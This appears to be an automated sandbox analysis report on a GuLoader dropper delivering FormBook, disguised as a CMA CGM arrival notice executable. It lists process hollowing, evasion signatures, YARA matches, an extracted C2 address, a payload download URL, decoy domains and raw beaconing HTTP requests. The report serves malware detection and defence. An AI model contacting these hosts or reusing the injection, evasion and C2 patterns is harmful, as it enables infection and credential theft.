Loading ...

Play interactive tourEdit tour

Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name:NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID:482590
MD5:e8bceea59b2074bd08bf68ab55ecdf3e
SHA1:8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256:0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
    • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}

Threatname: GuLoader

{"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x1a508:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 21 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228
      Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeVirustotal: Detection: 25%Perma Link
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeReversingLabs: Detection: 18%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: 14.2.rundll32.exe.a04480.0.unpackAvira: Label: TR/Dropper.Gen
      Source: 14.2.rundll32.exe.4d6f834.4.unpackAvira: Label: TR/Dropper.Gen
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

      Networking:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exeNetwork Connect: 142.111.236.6 80
      Source: C:\Windows\explorer.exeDomain query: www.microsoftjob.com
      Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exeDomain query: www.wxsjykj.com
      Source: C:\Windows\explorer.exeDomain query: www.everythingswallow.com
      Source: C:\Windows\explorer.exeDomain query: www.acooll.com
      Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
      Source: C:\Windows\explorer.exeDomain query: www.priorpublic.com
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80
      Source: C:\Windows\explorer.exeNetwork Connect: 54.65.172.3 80
      Source: C:\Windows\explorer.exeDomain query: www.taylormakeyourlife.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeDomain query: www.beckyhartpcpublishers.com
      Source: C:\Windows\explorer.exeDomain query: www.rlmwebcreations.com
      Source: C:\Windows\explorer.exeDomain query: www.dominionhavanese.com
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.acooll.com/kbl2/
      Source: Malware configuration extractorURLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
      Source: global trafficHTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 21:01:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/display.cfm
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
      Source: unknownDNS traffic detected: queries for: www.paulassinkarchitect.nl
      Source: global trafficHTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
